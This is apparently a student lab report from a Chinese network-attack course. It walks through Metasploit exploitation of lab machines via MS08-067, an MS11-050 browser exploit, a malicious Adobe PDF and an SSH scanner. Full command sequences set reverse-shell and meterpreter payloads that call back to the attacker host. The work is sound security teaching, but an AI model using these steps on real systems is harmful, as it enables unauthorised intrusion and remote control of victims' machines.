2018-2019-2 《网络对抗技术》 Exp5 MSF基础应用

实验五 MSF基础应用

实验内容

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

      1.一个主动攻击实践,ms08_067(成功)

      2. 一个针对浏览器的攻击,ms11_050(成功)

      3. 一个针对客户端的攻击,Adobe(成功)

      4. 成功应用任何一个辅助模块,scanner/ssh/ssh_version,(成功,唯一)

基础问题

用自己的话解释什么是exploit,payload,encode:

  • Exploit:exploit 的英文意思为利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),有Exploit就肯定有漏洞。我自己的理解是一种攻击模块。
  • Payload:字面意思 “有效载荷,有效负荷,有效载重”。对于程序员来说就是在程序中起关键作用的代码。
  • Encode:对payload进行一定程度的编码,从而使之达到免杀的程度

实验步骤

查看各端的 IP地址:

攻击机Kali: 192.168.10.138 

靶机Win7: 192.168.10.137 

靶机WinXP:  192.168.10.139 

靶机Win2k: 192.168.10.140 

(一)一个主动攻击实践

Windows服务渗透攻击——MS08-067安全漏洞

ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞。

  • 输入 msfconsole 进入控制台

  • 输入 search ms08_067 进行搜索漏洞

  • 复制所在位置并使用, use exploit/windows/smb/ms08_067_netapi 

  • 输入 show options 可以查看当前配置

  • 依次输入以下指令,进行配置
# show payloads
# set payload generic/shell_reverse_tcp //tcp反向回连
# set LHOST 192.168.10.138 //设置攻击机IP
# set LPORT 5234 //攻击端口
# set RHOST 192.168.10.137 //设置靶机IP
# set target 0 //自动选择目标系统类型,匹配度较高
# exploit //探测并攻击

  • 输入 exploit 进行监听

  • 好的,渗透失败,看来Win7已经打过补丁了。输入info 并查看,就会发现,果然Available targets不包含Win7...
  • 接下来试试WinXP

 

出现如下情况: Exploit completed, but no session was created. 

通过查找资料,得知导致该情况的原因可能有:

1. 被攻击机器的防火墙打开了。

2. 不满足漏洞触发条件;目标系统不受此漏洞影响。

3. 过程有遗漏或错误(payload、set target)。

我在检查了网络连通状况、靶机系统版本、防火墙,Kali端的payload、set target之后,发现均无问题,所以暂时没有找出解决此问题的办法。

接下来试试Win2k吧。

  • 渗透成功,接下来便可进行攻击啦。

参考资料

(二)一个针对浏览器的攻击

ms11_050

靶机:Win7;浏览器:IE8

  • 输入 msfconsole 进入控制台
  • 输入 search ms11_050 ,搜索漏洞的相关信息

  • 输入 use exploit/windows/browser/ms11_050_mshtml_cobjectelement ,使用该漏洞
  • 依次输入如下指令
# set payload windows/meterpreter/reverse_tcp //选择载荷
# set LHOST 192.168.10.138  //设置攻击机IP
# set LPORT 5234
# set RHOST 192.168.10.137  //设置靶机IP
# exploit

  • 将生成的网址输入Win7的IE8中

  • kali自动回连,渗透成功。

(三)一个针对客户端的攻击

Adobe PDF阅读器

靶机:Win7

  • 输入 msfconsole 进入控制台
  • 输入 search adobe 搜索漏洞的相关信息

  • 在经过不断地尝试和寻找之后,成功了找到了如下漏洞
  • 输入use windows/fileformat/adobe_reader_u3d
  • 依次输入以下指令:
# info //查看漏洞具体信息
# set payload windows/meterpreter/reverse_tcp //选择攻击载荷
# set LHOST 192.168.10.138 //攻击机IP
# set LPORT 5234 //设置端口号
# set FILENAME 20165234.pdf //设置文件名
# show options //查看设置
# exploit

  • 生成PDF文件 20165234.pdf 

  • 在win7的靶机中打开20165221.pdf
  • 在攻击机中进行攻击,即可获得win7机的权限

 

(四)成功应用任何一个辅助模块

靶机:Win7 192.168.10.137

模块:scanner/ssh/ssh_version

  • 在msfconsole中通过命令 show auxiliary 查看所有的辅助模块

  • 输入 info 查看这个模块的作用,可见其用于扫描ssh的服务版本

  • 设置其所需要的参数并进行攻击

  • 成功地进行了扫描

实验中遇到的问题

  • 在做第一个主动攻击实践时就遇到了问题,具体问题及解决步骤我在前面贴出来了。
  • 在做adobe那部分的实验过程中,我运用命令生成了 20165234.pdf ,可是一直都找不到生成的文件存放在哪,主目录里找不到.msf4的文件夹,解决办法如下:

1. 先在“显示隐藏文件”处打钩,会发现 20165234.pdf 位于(home/.mf4/local)

2. 使用 cd .msf4/local ,输入 ls 便可查看到 20165234.pdf ,使用命令 mv 20165234.pdf /home 将pdf移动到主目录便可以看见了 。

离实战还缺些什么技术或步骤

  • 信息收集扫描的重要性,掌握准确的信息是成功的关键因素。
  • msf只是攻击漏洞的一个工具,要想针对某个漏洞进行攻击,还是得参考网上搜索的资料和步骤。
  • 我现在只能依赖已有的攻击教程,根据想要的攻击的方法选择已有的模块进行攻击。所以想真正用好msf,还得多话费功夫去自行研究。

 实验总结与体会

  • 我觉得本次实验逻辑较为清晰,总体来说实验过程还是比较顺利的。
  • 寻找靶机和选择漏洞的过程就花费了很大的力气,由此可见攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。
  • 没有任何一个程序是十全十美的,所以在平时的使用过程中就要做到及时更新、注意打补丁。
posted @ 2019-04-21 21:28  Iconic_V  阅读(239)  评论(0编辑  收藏  举报